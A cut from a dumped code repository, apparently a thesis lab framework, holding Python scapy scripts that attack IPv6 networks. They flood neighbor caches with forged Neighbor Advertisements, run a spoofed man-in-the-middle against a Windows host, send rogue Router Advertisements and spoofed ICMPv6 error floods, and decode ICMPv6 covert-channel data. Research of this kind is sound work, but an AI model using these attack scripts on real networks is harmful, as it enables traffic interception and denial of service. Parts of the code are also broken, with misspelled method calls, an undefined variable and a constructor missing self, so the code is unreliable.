range(0,500):\n packet = IPv6(dst=self.win,src=self.firewall)/ICMPv6DestUnreach(code=2)/IPv6(dst=self.attacker,src=self.win,hlim=128)/TCP(dport=80,sport=49255,flags=\"S\")\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachBeyondScopeSrcAdrLinux(self, exitIface):\n for x in range(0,500):\n packet = IPv6(dst=self.linux,src=self.firewall)/ICMPv6DestUnreach(code=2)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/TCP(dport=80,sport=49255,flags=\"S\")\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachSrcFailedPolicyWin(self, exitIface):\n for x in range(0,500):\n packet = IPv6(dst=self.win,src=self.firewall)/ICMPv6DestUnreach(code=5)/IPv6(dst=self.attacker,src=self.win,hlim=128)/TCP(dport=80,sport=49255,flags=\"S\")\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachSrcFailedPolicyLinux(self, exitIface):\n for x in range(0,500):\n packet = IPv6(dst=self.linux,src=self.firewall)/ICMPv6DestUnreach(code=5)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/TCP(dport=80,sport=49255,flags=\"S\")\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachRejectRouteWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0,500):\n packet = IPv6(dst=self.win,src=self.firewall)/ICMPv6DestUnreach(code=6)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=1)/data\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachRejectRouteLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0,500):\n packet = IPv6(dst=self.linux,src=self.firewall)/ICMPv6DestUnreach(code=6)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=1)/data\n send(packet, iface=exitIface, verbose=False)\n\n \n" }, { "alpha_fraction": 0.6124265789985657, "alphanum_fraction": 0.6215061545372009, "avg_line_length": 46.193275451660156, "blob_id": "26deece870d90cf058833a1b32368814661fb6ba", "content_id": "c7215a26eba328318309d90ad024dee3993beda4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5617, "license_type": "no_license", "max_line_length": 79, "num_lines": 119, "path": "/python/code/neighbDisc.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport re, uuid\nimport os\nimport readline\nfrom pprint import pprint\nfrom commands import *\nfrom RAAttacks import *\nfrom NAAttacks import *\nfrom NSAttacks import *\nfrom redirectAttacks import *\n\n\"\"\"\nThis is general class to start Neighbor Discovery protocol tests.\nThe linuxInterface and windwosInterface variables must be changed accordingly.\n\"\"\"\nclass NeighborDiscoveryAttacks:\n\n def __init__(self, iface):\n self.ipAddress = ''\n self.iface = iface\n self.name = 'NeighborDiscovery'\n self.linuxInterface = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n self.windowsInterface = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n self.firewallAddress = \"2001:abcd:acad:2::1\"\n\n\n def startSystem(self):\n Commands.setNeighborDiscoveryAttacksHistory()\n running = 1\n while running:\n readline.parse_and_bind(\"tab: complete\")\n #we receive data from the keyboard \n command = raw_input(self.name + ' >>')\n #help command\n if re.match('help', command):\n self.showHelp()\n #quit module command\n elif re.match('quit', command):\n running = 0\n Commands.setAttackingChannelHistory()\n elif re.match('setAdr', command):\n self.ipAddress = re.sub('setAdr', ' ', command).lstrip()\n print 'setting Ip address: ' + self.ipAddress\n #-----Router Advertisement section-----\n #execution of all RA with Prefix tests\n elif re.match('execRAPrefixRemote', command):\n ra = RAPrefixOption(self.linuxInterface, self.windowsInterface)\n ra.execModule(self.iface, self.ipAddress)\n #execution of RA with Prefix internal verification\n elif re.match('execRAPrefixInternal', command):\n ra = RAPrefixOption(self.linuxInterface, self.windowsInterface)\n ra.execModuleInternal(self.iface, self.ipAddress)\n #execution of all RA with MTU tests\n elif re.match('execRAMTURemote', command):\n ra = RAMTUOption(self.linuxInterface, self.windowsInterface)\n ra.execModule(self.iface, self.ipAddress)\n #execution of RA with MTU internal verification\n elif re.match('execRAMTUInternal', command):\n ra = RAMTUOption(self.linuxInterface, self.windowsInterface)\n ra.execModuleInternal(self.iface, self.ipAddress)\n\n #-----Neighbor Advertisement section-----\n \n #execution of Win Mitm with internal NAs\n elif re.match('execNAWinMitmInternal', command):\n na = NA(self.linuxInterface, self.windowsInterface)\n na.execModuleInternalWinMitm(self.iface)\n #execution of Cache Flooding with internal NAs\n elif re.match('execNACacheFloodingInternal', command):\n na = NA(self.linuxInterface, self.windowsInterface)\n na.execModuleInternalCacheFlooding(self.iface, self.ipAddress)\n #execution of Cache Flooding with remote NAs to linux internal\n elif re.match('execNACacheFloodingRemoteLinux', command):\n na = NA(self.linuxInterface, self.windowsInterface)\n na.execModuleRemoteLinuxCacheFlooding(self.iface)\n #execution of NA remote test\n elif re.match('execNARemote', command):\n na = NA(self.linuxInterface, self.windowsInterface)\n na.execModule(self.iface, self.ipAddress)\n \n #-----Neighbor Solicitation section-----\n \n #execution of NS internal test\n elif re.match('execNSInternalFlooding', command):\n ns = NS(self.linuxInterface, self.windowsInterface)\n ns.execModuleInternalCacheFlooding(self.iface, self.ipAddress)\n elif re.match('execNSInternalSelfSolWin', command):\n ns = NS(self.linuxInterface, self.windowsInterface)\n ns.execModuleInternalWinSelfSol(self.iface)\n elif re.match('execNSInternalSelfSolLinux', command):\n ns = NS(self.linuxInterface, self.windowsInterface)\n ns.execModuleInternalLinuxSelfSol(self.iface)\n elif re.match('execNSRemoteSelfSolLinux', command):\n ns = NS(self.linuxInterface, self.windowsInterface)\n ns.execModuleRemoteLinuxSelfSol(self.iface)\n elif re.match('execNSInternal', command):\n ns = NS(self.linuxInterface, self.windowsInterface)\n ns.execModuleInternal(self.iface, self.ipAddress)\n #execution of NS remote test\n elif re.match('execNSRemote', command):\n ns = NS(self.linuxInterface, self.windowsInterface)\n ns.execModule(self.iface, self.ipAddress)\n\n #----Redirect section-----\n\n #execution of Redirect internal test\n elif re.match('execRedirectInternal', command):\n redirect = Redirect(self.linuxInterface, self.windowsInterface)\n redirect.execModuleInternal(self.iface, self.ipAddress)\n #execution of Redirect remote test\n elif re.match('execRedirectRemote', command):\n redirect = Redirect(self.linuxInterface, self.windowsInterface)\n redirect.execModuleRemote(self.iface, self.ipAddress)\n \n def showHelp(self):\n for entry in Help.getNeighborDiscoveryAttacksHelp():\n print entry\n\n" }, { "alpha_fraction": 0.6141965389251709, "alphanum_fraction": 0.6563182473182678, "avg_line_length": 49.86507797241211, "blob_id": "38fd6776ce60c8b0e1119e751c3769055c04807d", "content_id": "835603e8a3b6986acc4f54f94cd06928d3e51231", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6410, "license_type": "no_license", "max_line_length": 127, "num_lines": 126, "path": "/python/code/NAAttacks.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\nfrom sets import Set\n\n\n\"\"\"\nthe class build NA messages\n\"\"\"\nclass NA:\n \n def __init__(self):\n self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n self.linuxMac = \"08:00:27:84:bb:37\"\n self.linuxSolicitedMulti = \"ff02::1:ff84:bb37\"\n self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n self.winMac = \"08:00:27:82:a6:ec\"\n self.winSolicitedMulti = \"ff02::1:ff47:fd83\"\n self.linkWin = \"fe80::b485:2aec:9447:fd83\"\n self.firewall = \"2001:abcd:acad:2::1\"\n self.firewallMac = \"08:00:27:b1:da:41\"\n self.linkFirewall = \"fe80::1\"\n self.prefix = \"2001:abcd:acad:2:\"\n self.adrList = Set()\n print 'Neighbor Advertisement'\n\n \n def buildPacketInternalCacheFlooding(self, mac, srcGlobalUni, ipAdr):\n targetLinkLayer = ICMPv6NDOptDstLLAddr(lladdr=mac)\n return Ether(src=mac)/IPv6(dst=ipAdr,src=srcGlobalUni)/ICMPv6ND_NA(R=0,S=1,O=1,tgt=srcGlobalUni)/targetLinkLayer\n\n def buildPacketInternalMitm(self, mac, src, dst, isRouter, solicited):\n targetLinkLayer = ICMPv6NDOptDstLLAddr(lladdr=mac)\n return Ether(src=mac)/IPv6(dst=dst,src=src)/ICMPv6ND_NA(R=isRouter,S=solicited,O=1,tgt=srcGlobalUni)/targetLinkLayer\n\n def buildPacketRemoteCacheFlooding(self, mac, dst, tgtGlobalUni):\n targetLinkLayer = ICMPv6NDOptDstLLAddr(lladdr=mac)\n return Ether(src=mac)/IPv6(dst=dst,src=tgtGlobalUni)/ICMPv6ND_NA(R=0,S=1,O=1,tgt=tgtGlobalUni)/targetLinkLayer\n\n\n #interfaces for internal testing\n def execModuleInternalCacheFloodingWin(self, exitIface):\n start = 0x0001\n end = 0xffff\n for t in xrange(start, end):\n hex24 = '{:04x}'.format(t)\n mac = \"08:00:27:\" + \"00\" + \":\" + hex24[:2] + \":\" + hex24[2:4]\n globalUni = self.prefix + \":\" + hex24[:2] + \":\" + hex24[2:4]\n #the ping activates the process to be poisoned\n data = \"abcdefghijklmnopqrstabcd\"\n ping = IPv6(dst=self.win,src=globalUni)/ICMPv6EchoRequest()/data\n send(ping, iface=exitIface, verbose=False)\n #send NA after victim sent NS to verify reachability and insert in neighbors cache and then respond with Echo reply\n packetContainer = self.buildPacketInternalCacheFloding(mac, globalUni, self.win)\n sendp(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleInternalCacheFloodingLinux(self, exitIface):\n start = 0x0001\n end = 0xffff\n for t in xrange(start, end):\n hex24 = '{:04x}'.format(t)\n mac = \"08:00:27:\" + \"00\" + \":\" + hex24[:2] + \":\" + hex24[2:4]\n globalUni = self.prefix + \":\" + hex24[:2] + \":\" + hex24[2:4]\n #the ping activates the process to be poisoned\n data = \"abcdefghijklmnopqrstabcd\"\n ping = IPv6(dst=self.linux,src=globalUni)/ICMPv6EchoRequest()/data\n send(ping, iface=exitIface, verbose=False)\n #send NA after victim sent NS to verify reachability and insert in neighbors cache and then respond with Echo reply\n packetContainer = self.buildPacketInternalCacheFloding(mac, globalUni, self.linux)\n sendp(packetContainer, iface=exitIface, verbose=False)\n\n #internally only against Windows\n def execModuleInternalWinMitm(self, exitIface):\n data = \"abcdefghijklmnopqrstabcd\"\n #this is to induce windows to disclose its temp adr\n pingWindows = IPv6(dst=self.win)/ICMPv6EchoReply()\n send(pingWindows, iface=exitIface, verbose=False)\n #ping windows device\n pingWindows = IPv6(dst=self.linkWin,src=self.linkFirewall)/ICMPv6EchoRequest()/data\n send(pingWindows, iface=exitIface, verbose=False)\n #send NA using link local after windows start reachability process\n packetContainerWin = self.buildPacketInternalMitm(self.linux, self.linkFirewall, self.linkWin, True, 1)\n sendp(packetContainerWin, iface=exitIface, verbose=False)\n #send NA using Firewall src global after windows start reachability process\n packetContainerWinFGlobal = self.buildPacketInternalMitm(self.linux, self.firewall, self.linkWin, True, 1)\n sendp(packetContainerWinFGlobal, iface=exitIface, verbose=False)\n #send NA to Firewall using link local\n packetContainerFirewall = self.buildPacketInternalMitm(self.linux, self.linkWin, self.linkFirewall, False, 0)\n sendp(packetContainerFirewall, iface=exitIface, verbose=False)\n #the sniffer eventually grabs the win tmp adr\n self.receiver(exitIface)\n print self.adrList\n #continue to send NA to both firewall and win to maintain Mitm\n for p in range(1,500):\n for adr in self.adrList:\n packet = self.buildPacketInternalMitm(self.linux, adr, self.linkFirewall, False, 1)\n sendp(packet, iface=exitIface, verbose=False)\n sendp(packetContainerFirewall, iface=exitIface, verbose=False)\n sendp(packetContainerWin, iface=exitIface, verbose=False)\n sendp(packetContainerWinFGlobal, iface=exitIface, verbose=False)\n\n def execModuleRemoteLinuxCacheFlooding(self, exitIface):\n start = 0x0001\n end = 0xffff\n for t in xrange(start, end):\n hex24 = '{:04x}'.format(t)\n mac = \"08:00:27:\" + \"00\" + \":\" + hex24[:2] + \":\" + hex24[2:4]\n globalUni = self.prefix + \":\" + hex24[:2] + \":\" + hex24[2:4]\n #the ping activates the poisoning\n data = \"abcdefghijklmnopqrstabcd\"\n ping = IPv6(dst=self.linux,src=globalUni)/ICMPv6EchoRequest()/data\n send(ping, iface=exitIface, verbose=False)\n packetContainer = self.buildPacketRemoteCacheFlooding(mac, self.linux, globalUni)\n sendp(packetContainer, iface=exitIface, verbose=False)\n\n #the callback adds IPv6 adr with the prefix and which are not internal Linux Debian\n def packet_callback(self, packet):\n if IPv6 in packet[0]:\n adr = packet[IPv6].dst\n print adr\n if self.prefix in adr and not adr == self.linux:\n self.adrList.add(adr) \n\n #the sniffer for the internal Mitm NA attack\n def receiver(self, iFace):\n sniff(iface=iFace, filter='ip6', prn=self.packet_callback, store=0, timeout=10)\n\n" }, { "alpha_fraction": 0.580542266368866, "alphanum_fraction": 0.6331738233566284, "avg_line_length": 25.125, "blob_id": "289ba08f672c4256ee1c0a40810720b0b5ac7bdc", "content_id": "18f0fe96b817fda4aaed37bd56ed1ea821730b17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1254, "license_type": "no_license", "max_line_length": 78, "num_lines": 48, "path": "/thesis/files/monitorWinFirewall.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport threading\nimport time\nfrom scapy.all import *\n\ndef packet_callback(packet):\n if ICMPv6ParamProblem in packet[0]:\n adr = packet[IPv6].src\n code = packet[ICMPv6ParamProblem].code\n print code\n print adr\n\ndef receiver(iface):\n sniff(iface=iface, filter='ip6', prn=packet_callback, store=0, timeout=20)\n\nclass receiverThread(threading.Thread):\n\n def __init__(self, iface):\n threading.Thread.__init__(self)\n self.iface = iface\n\n def run(self):\n print \"Starting Receiving Packets\"\n rec = receiver(self.iface)\n\nclass echoSenderThread(threading.Thread):\n\n def __init__(self, iface, target):\n threading.Thread.__init__(self)\n self.iface = iface\n self.target = target\n\n def run(self):\n print \"Starting sending pongs\"\n for x in range(1,100):\n p = IPv6(dst=self.target)/ICMPv6EchoReply()\n send(p, iface=self.iface, verbose=False)\n time.sleep(2)\n\nwin = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\nlinux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\nallNodes = \"ff02::1\"\nrec = receiverThread(\"eth0\")\nsendEcho = echoSenderThread(\"eth0\", win)\n\nrec.start()\nsendEcho.start()\n" }, { "alpha_fraction": 0.6096311211585999, "alphanum_fraction": 0.6762295365333557, "avg_line_length": 35.14814758300781, "blob_id": "b22b14d79a597f8dc7b7c531a2723c5da6ba9562", "content_id": "52c23103cb8ff0ebdc2f4a96e0b319489bd5a4db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 976, "license_type": "no_license", "max_line_length": 188, "num_lines": 27, "path": "/python/code/RSAttacks.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\n\n\n\"\"\"\nThis class test change/addition of prefix and MTU value with Router Advertisement.\n\"\"\" \nclass RS:\n \n def __init__():\n self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n self.firewall = \"2001:abcd:acad:2::1\"\n self.firewallMac = \"08:00:27:b1:da:41\"\n self.linkFirewall = \"fe80::1\"\n print 'Router Solicitation'\n\n #test to verify the possibility of exploitment, to be done in internal network\n def buildPacketInternalPrefix(self, ipAdr):\n return IPv6(dst=ipAdr,src=self.linkFirewall)/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefixlen=64,L=1,A=1,R=1,prefix=\"2001:abcd:1234:1::\")/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n\n def execModuleInternalPrefixWin(self, exitIface):\n packetContainer = self.buildPacketInternalPrefix(self.win)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n" }, { "alpha_fraction": 0.620103120803833, "alphanum_fraction": 0.6505154371261597, "avg_line_length": 29.3125, "blob_id": "f56ee495745188f783b94c21e853f6cb7cc15e11", "content_id": "acac0cd20a68228f920ad53dc87609091b7d02d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1940, "license_type": "no_license", "max_line_length": 97, "num_lines": 64, "path": "/python/code/echoReply.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\nfrom sets import Set\nimport threading\nimport time\n\n\n\"\"\"\nthe class build Echo Reply messages\n\"\"\"\nclass EchoReply:\n \n def __init__(self):\n self.adrList = Set()\n print 'Echo Reply'\n self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n \n\n def buildPacketEchoReply(self, ipAdr):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n return IPv6(dst=ipAdr)/ICMPv6EchoReply(id=0,seq=0)/data\n \n #sending unsolicited reply to windows 7 internal with firewall off cause the dev to send back\n #Parameter Problem (4) code 1 Unrecognized next header type\n def execModuleEchoReplyWin(self, exitIface):\n receiver = ReceiverThread(exitIface)\n receiver.start()\n packetContainer = self.buildPacketEchoReply(self.win)\n for x in range(1,10):\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleEchoReplyLinux(self, exitIface):\n receiver = ReceiverThread(exitIface)\n receiver.start()\n packetContainer = self.buildPacketEchoReply(self.linux)\n for x in range(1,10):\n send(packetContainer, iface=exitIface, verbose=False)\n \n\n\n\"\"\"\nThreads necessary to start the receiver and at the same time send packets\n\"\"\" \nclass ReceiverThread(threading.Thread):\n \n def __init__(self, iface):\n threading.Thread.__init__(self)\n self.iface = iface\n\n def run(self):\n print \"Starting Receiving Packets\"\n rec = self.receiver(self.iface)\n\n def packet_callback(self, packet):\n if ICMPv6ParamProblem in packet[0]:\n adr = packet[IPv6].src\n code = packet[ICMPv6ParamProblem].code\n print code\n print adr\n\n def receiver(self, iFace):\n sniff(iface=iFace, filter='ip6', prn=self.packet_callback, store=0, timeout=10)\n" }, { "alpha_fraction": 0.569487988948822, "alphanum_fraction": 0.5708812475204468, "avg_line_length": 30.20652198791504, "blob_id": "282992bb7640568d9ac54c7e877b4d0c71fc01dc", "content_id": "23016a8d777c3cfae91a9bb1eb9cfff73b221976", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2871, "license_type": "no_license", "max_line_length": 66, "num_lines": 92, "path": "/python/code/testingFramework.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport re, uuid\nimport os\nimport readline\nfrom pprint import pprint\nfrom commands import *\nfrom covertChannels import *\nfrom allCovertTest import *\nfrom allAttackingTest import *\nfrom neighbDisc import *\nfrom infoAndErrorAttacks import *\n\n\"\"\"\nclass responsible for Covert Channel module\n\"\"\"\nclass CovertChannel:\n\n def __init__(self, iface):\n self.name = 'Covert'\n self.iface = iface\n \n #starts the interactive propmt\n def startSystem(self):\n Commands.setCovertChannelHistory()\n running = 1\n while running:\n readline.parse_and_bind(\"tab: complete\")\n #we receive data from the keyboard \n command = raw_input(self.name + ' >>')\n #help command\n if re.match('help', command):\n self.showHelp()\n #quit module command\n elif re.match('quit', command):\n running = 0\n Commands.setTestingFrameworkHistory()\n #set echo request covert channel\n elif re.match(r'setEchoRequest', command):\n covert = EchoRequest()\n covert.startSystem()\n #set all covert channel tests\n elif re.match(r'setAll', command):\n covert = AllCovertTests(self.iface)\n covert.startSystem()\n else:\n print 'Error! Command not found!'\n\n def showHelp(self):\n for entry in Help.getCovertChannelHelp():\n print entry\n\n\n\"\"\"\nclass responsible for Attacking Channel module\n\"\"\"\nclass AttackingChannel:\n\n def __init__(self, iface):\n self.name = 'Attacking'\n self.iface = iface\n\n #starts the interactive propmt\n def startSystem(self):\n Commands.setAttackingChannelHistory()\n running = 1\n while running:\n readline.parse_and_bind(\"tab: complete\")\n #we receive data from the keyboard \n command = raw_input(self.name + ' >>')\n #help command\n if re.match('help', command):\n self.showHelp()\n #quit module command\n elif re.match('quit', command):\n running = 0\n Commands.setMainHistory()\n #set all Neighbor Discovery tests\n elif re.match(r'setNeighborDiscovery', command):\n neighDisc = NeighborDiscoveryAttacks(self.iface)\n neighDisc.startSystem()\n #set all Informational and Error tests\n elif re.match(r'setInfoAndError', command):\n infoError = InfoAndErrorAttacks(self.iface)\n infoError.startSystem()\n else:\n print 'Error! Command not found!'\n\n def showHelp(self):\n for entry in Help.getAttackingChannelHelp():\n print entry\n" }, { "alpha_fraction": 0.5994047522544861, "alphanum_fraction": 0.6297619342803955, "avg_line_length": 22.33333396911621, "blob_id": "25167a102ba1c443076d775acfec362a92e6b105", "content_id": "8621d640c358cb951277882684ec3d5d26e995ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1680, "license_type": "no_license", "max_line_length": 78, "num_lines": 72, "path": "/python/code/monitorWinFirewall.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport threading\nimport time\nfrom scapy.all import *\n\n\ndef packet_callback(packet):\n if ICMPv6ParamProblem in packet[0]:\n adr = packet[IPv6].src\n code = packet[ICMPv6ParamProblem].code\n print code\n print adr\n\n\ndef receiver(iface):\n sniff(iface=iface, filter='ip6', prn=packet_callback, store=0, timeout=20)\n\n\nclass receiverThread(threading.Thread):\n \n def __init__(self, iface):\n threading.Thread.__init__(self)\n self.iface = iface\n\n def run(self):\n print \"Starting Receiving Packets \"\n rec = receiver(self.iface)\n\n\nclass echoSenderThread(threading.Thread):\n\n def __init__(self, iface, target):\n threading.Thread.__init__(self)\n self.iface = iface\n self.target = target\n\n def run(self):\n print \"Starting sending pongs\"\n for x in range(1,100):\n #reply = EchoReply(self.target)\n #reply.execModuleEchoReply(self.iface)\n p = IPv6(dst=self.target,nh=201)\n send(p, iface=self.iface, verbose=False)\n time.sleep(2)\n\n\n\"\"\"\nthe class build Echo Reply messages\n\"\"\"\nclass EchoReply:\n \n def __init__(self, ipAdr):\n self.ipAdr = ipAdr\n\n def buildPacketEchoReply(self):\n return IPv6(dst=self.ipAdr)/ICMPv6EchoReply()\n\n def execModuleEchoReply(self, exitIface):\n packetContainer = self.buildPacketEchoReply()\n send(packetContainer, iface=exitIface, verbose=False)\n\n \n\n\nwin = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\nlinux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\nrec = receiverThread(\"eth0\")\nsendEcho = echoSenderThread(\"eth0\", win)\n\nrec.start()\nsendEcho.start()\n" }, { "alpha_fraction": 0.5785372853279114, "alphanum_fraction": 0.5788914561271667, "avg_line_length": 39.91304397583008, "blob_id": "dbd1f6822e21d38143dc1bfcf7d49cec6b916e1c", "content_id": "263521bfaa731a244650f7de294ad4f666043011", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5647, "license_type": "no_license", "max_line_length": 78, "num_lines": 138, "path": "/python/code/neighbDisc.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport re, uuid\nimport os\nimport readline\nfrom pprint import pprint\nfrom commands import *\nfrom RAAttacks import *\nfrom RSAttacks import *\nfrom NAAttacks import *\nfrom NSAttacks import *\nfrom redirectAttacks import *\n\n\"\"\"\nThis is general class to start Neighbor Discovery protocol tests.\nThe linuxInterface and windwosInterface variables must be changed accordingly.\n\"\"\"\nclass NeighborDiscoveryAttacks:\n\n def __init__(self, iface):\n self.iface = iface\n self.name = 'NeighborDiscovery'\n\n def startSystem(self):\n Commands.setNeighborDiscoveryAttacksHistory()\n running = 1\n while running:\n readline.parse_and_bind(\"tab: complete\")\n #we receive data from the keyboard \n command = raw_input(self.name + ' >>')\n #help command\n if re.match('help', command):\n self.showHelp()\n #quit module command\n elif re.match('quit', command):\n running = 0\n Commands.setAttackingChannelHistory()\n\n #-----Router Advertisement section-----\n \n #execution of RA with Prefix internal verification\n elif re.match('execRAPrefixInternalWin', command):\n ra = RA()\n ra.execModuleInternalPrefixWin(self.iface)\n elif re.match('execRAPrefixInternalLinux', command):\n ra = RA()\n ra.execModuleInternalPrefixLinux(self.iface)\n #execution of RA with MTU internal verification\n elif re.match('execRAMTUInternalWin', command):\n ra = RA()\n ra.execModuleInternalMTUWin(self.iface)\n elif re.match('execRAMTUInternalLinux', command):\n ra = RA()\n ra.execModuleInternalMTULinux(self.iface)\n #execution of remote RA with Prefix tests \n elif re.match('execRAPrefixRemoteWin', command):\n ra = RA()\n ra.execModuleRemotePrefixWin(self.iface)\n elif re.match('execRAPrefixRemoteLinux', command):\n ra = RA()\n ra.execModuleRemotePrefixLinux(self.iface)\n #execution of remote RA with MTU tests\n elif re.match('execRAMTURemoteWin', command):\n ra = RA()\n ra.execModuleRemoteMTUWin(self.iface)\n elif re.match('execRAMTURemoteLinux', command):\n ra = RA()\n ra.execModuleRemoteMTULinux(self.iface)\n\n #-----Router Solicitation section-----\n \n #execution of RS with internal verification\n elif re.match('execRSInternalWin', command):\n ra = RS()\n ra.execModuleInternalWin(self.iface)\n elif re.match('execRSInternalLinux', command):\n ra = RS()\n ra.execModuleInternalLinux(self.iface)\n elif re.match('execRSInternalFirewall', command):\n ra = RS()\n ra.execModuleInternalFirewall(self.iface)\n\n #-----Neighbor Advertisement section-----\n\n #execution of Cache Flooding with internal NAs\n elif re.match('execNACacheFloodingInternalWin', command):\n na = NA()\n na.execModuleInternalCacheFloodingWin(self.iface)\n elif re.match('execNACacheFloodingInternalLinux', command):\n na = NA()\n na.execModuleInternalCacheFloodingLinux(self.iface)\n #execution of Win Mitm with internal NAs\n elif re.match('execNAWinMitmInternal', command):\n na = NA()\n na.execModuleInternalWinMitm(self.iface)\n #execution of Cache Flooding with remote NAs to linux internal\n elif re.match('execNACacheFloodingRemoteLinux', command):\n na = NA()\n na.execModuleRemoteLinuxCacheFlooding(self.iface)\n \n #-----Neighbor Solicitation section-----\n \n #execution of NS internal test\n elif re.match('execNSInternalFloodingWin', command):\n ns = NS()\n ns.execModuleInternalCacheFloodingWin(self.iface)\n elif re.match('execNSInternalFloodingLinux', command):\n ns = NS()\n ns.execModuleInternalCacheFloodingLinux(self.iface)\n elif re.match('execNSInternalSelfSolWin', command):\n ns = NS()\n ns.execModuleInternalWinSelfSol(self.iface)\n elif re.match('execNSInternalSelfSolLinux', command):\n ns = NS()\n ns.execModuleInternalLinuxSelfSol(self.iface)\n #execution of NS external test\n elif re.match('execNSRemoteSelfSolLinux', command):\n ns = NS()\n ns.execModuleRemoteLinuxSelfSol(self.iface)\n\n #----Redirect section-----\n\n #execution of Redirect internal test\n elif re.match('execRedirectInternalWin', command):\n redirect = Redirect()\n redirect.execModuleInternalWin(self.iface)\n #execution of Redirect remote test\n elif re.match('execRedirectRemoteWin', command):\n redirect = Redirect()\n redirect.execModuleRemoteWin(self.iface)\n elif re.match('execRedirectRemoteLinux', command):\n redirect = Redirect()\n redirect.execModuleRemoteLinux(self.iface)\n \n def showHelp(self):\n for entry in Help.getNeighborDiscoveryAttacksHelp():\n print entry\n\n" }, { "alpha_fraction": 0.4955225884914398, "alphanum_fraction": 0.5087260603904724, "avg_line_length": 40.4607048034668, "blob_id": "01a7524e55c853176f99229c8c5009a5e34c2904", "content_id": "d72909db16a681ee334f9d5f711b0a17f572f133", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15299, "license_type": "no_license", "max_line_length": 121, "num_lines": 369, "path": "/python/code/receiver.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport re, uuid\nimport os\nimport readline\nfrom pprint import pprint\nfrom commands import *\nfrom scapy.all import *\nfrom bitstring import *\n\nclass Receiver:\n\n def __init__(self, iface, adr):\n self.iface = iface\n self.ipAdr = adr\n self.containerBits = ''\n\n def packet_callback(self, packet):\n if ICMPv6DestUnreach in packet[0]:\n code = packet[ICMPv6DestUnreach].code\n length = packet[ICMPv6DestUnreach].length\n unused = packet[ICMPv6DestUnreach].unused\n #payload = packet[ICMPv6DestUnreach].load\n bitLength = 8\n container = self.extractBytes(code, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n bitLength = 8\n container = self.extractBytes(length, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n bitLength = 24\n container = self.extractBytes(unused, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n bitLength = 64\n #if payload != 'x':\n # try:\n # payload = int(payload)\n # container = self.extractBytes(payload, bitLength)\n # for item in container:\n # sys.stdout.write(chr(item))\n # sys.stdout.flush\n # except:\n # pass\n elif ICMPv6PacketTooBig in packet[0]:\n code = packet[ICMPv6PacketTooBig].code\n mtu = packet[ICMPv6PacketTooBig].mtu\n sys.stdout.write(chr(code))\n sys.stdout.flush()\n if mtu !=1280:\n bitLength = 32\n container = self.extractBytes(mtu, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n elif ICMPv6TimeExceeded in packet[0]:\n code = packet[ICMPv6TimeExceeded].code\n length = packet[ICMPv6TimeExceeded].length\n unused = packet[ICMPv6TimeExceeded].unused\n #payload = packet[ICMPv6TimeExceeded].load\n sys.stdout.write(chr(code))\n sys.stdout.flush()\n bitLength = 8\n container = 